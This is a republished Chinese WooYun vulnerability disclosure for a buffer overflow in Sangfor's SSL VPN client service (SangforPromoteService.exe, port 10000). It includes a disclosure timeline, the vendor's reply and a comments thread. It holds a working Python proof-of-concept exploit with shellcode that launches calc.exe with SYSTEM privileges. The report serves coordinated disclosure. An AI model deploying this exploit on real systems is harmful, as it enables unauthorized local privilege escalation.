深信服缓冲区溢出本地权限提升漏洞

2015年5月28日01:55:23评论358 views字数 213阅读0分42秒阅读模式

摘要

2014-08-21：细节已通知厂商并且等待厂商处理中
2014-08-21：厂商已经确认，细节仅向厂商公开
2014-08-24：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-10-15：细节向核心白帽子及相关领域专家公开
2014-10-25：细节向普通白帽子公开
2014-11-04：细节向实习白帽子公开
2014-11-19：细节向公众公开

漏洞概要关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-73307

漏洞标题：深信服缓冲区溢出本地权限提升漏洞

漏洞作者： cssembly

提交时间： 2014-08-21 12:50

公开时间： 2014-11-19 12:52

漏洞类型：权限提升

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：缓冲区溢出，代码执行，权限提升

1人收藏

漏洞详情

披露状态：

简要描述：

对接收的数据进行处理时存在缓冲区溢出漏洞，可执行任意代码，最终本地权限提升

详细说明：

深信服SangforPromoteService.exe进程监听本地10000端口，对接收的数据进行处理时存在缓冲区溢出漏洞，可执行任意代码，最终本地权限提升

漏洞证明：

可以看到SangforPromoteService.exe以system权限运行

执行poc后的效果如下，启动calc.exe以system权限运行

poc如下：

code 区域

import socket  
 import struct
 
 address = ('**.**.**.**', 10000)  
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect(address) 
 
 length = struct.pack('<i',0x400 - 8 );
 shellcode = "/x90/x90/x90/x90/x31/xD2/x52/x68/x63/x61/x6C/x63/x89/xE6/x52/x56/x64/x8B/x72/x30/x8B/x76/x0C/x8B/x76/x0C/xAD/x8B/x30/x8B/x7E/x18/x8B/x5F/x3C/x8B/x5C/x1F/x78/x8B/x74/x1F/x20/x01/xFE/x8B/x4C/x1F/x24/x01/xF9/x42/xAD/x81/x3C/x07/x57/x69/x6E/x45/x75/xF5/x0F/xB7/x54/x51/xFE/x8B/x74/x1F/x1C/x01/xFE/x03/x3C/x96/xFF/xD7/xCC"
 s.send('A'*4 + '/x02/x00/x00/x00' + length + 'A'*0x208 + '/x12/x45/xfa/x7f/x90/x90/x90/x90' + shellcode + 'B' * (0x400-0xc-0x208-8-len(shellcode)))  
   
 data = s.recv(512) 
 s.close()

修复方案：

版权声明：转载请注明来源 cssembly@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-08-21 18:59

厂商回复：

感谢白帽子提出的问题！

经内部确认，此次漏洞属于SSLVPN在PC端组件的漏洞。但如果想利用此漏洞进行攻击，攻击者首先需要通过操作系统或其他软件漏洞来获取PC端发送网络数据包的权限，然后才能利用该漏洞对PC端发起攻击。并且，利用此漏洞进行攻击只会影响单台PC，不影响SSLVPN设备。
所以我们将漏洞进行降级处理，漏洞最终评定级别为中级。

我们的补丁包已经在制作中，测试成功后，我们会第一时间发布。

请白帽子私信留下联系方式，我们送出的小礼品会飞速送出！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-08-21 12:57 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

0

赶脚很厉害的样子

1# 回复此人
2014-08-21 13:04 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

0

擦，好腻嗨的溢出牛牛

2# 回复此人
2014-08-21 13:44 | Gale Albatross ( 实习白帽子 | Rank:67 漏洞数:15 | Gale Albatross)

0

溢出牛啊；

3# 回复此人
2014-08-21 14:10 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

0

好屌啊。众测有二进制项目，来玩玩不。免门票啊

4# 回复此人
2014-08-21 15:05 | 大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)

0

@zeracker 乌云大牛亲自邀请啊

5# 回复此人
2014-08-21 19:02 | 深信服(乌云厂商)

0

感谢白帽子第一时间配合我们确认细节！相当nice+！

6# 回复此人
2014-08-21 19:21 | cssembly ( 普通白帽子 | Rank:202 漏洞数:23 | 天资不足，勤奋有余！)

0

@深信服所以我的漏洞才叫本地权限提升，这个但是依旧属于高危漏洞，我觉得

7# 回复此人
2014-08-21 19:44 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

0

@zeracker 二进制项目是啥?汇编么?

8# 回复此人
2014-08-21 22:28 | cssembly ( 普通白帽子 | Rank:202 漏洞数:23 | 天资不足，勤奋有余！)

0

@zeracker 有时间的话就玩

9# 回复此人
2014-08-22 03:26 | netwind ( 普通白帽子 | Rank:250 漏洞数:41 | 挖掘漏洞为乐趣)

0

二进制的很少啊。

10# 回复此人

漏洞概要 关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-73307

漏洞标题： 深信服缓冲区溢出本地权限提升漏洞

相关厂商： 深信服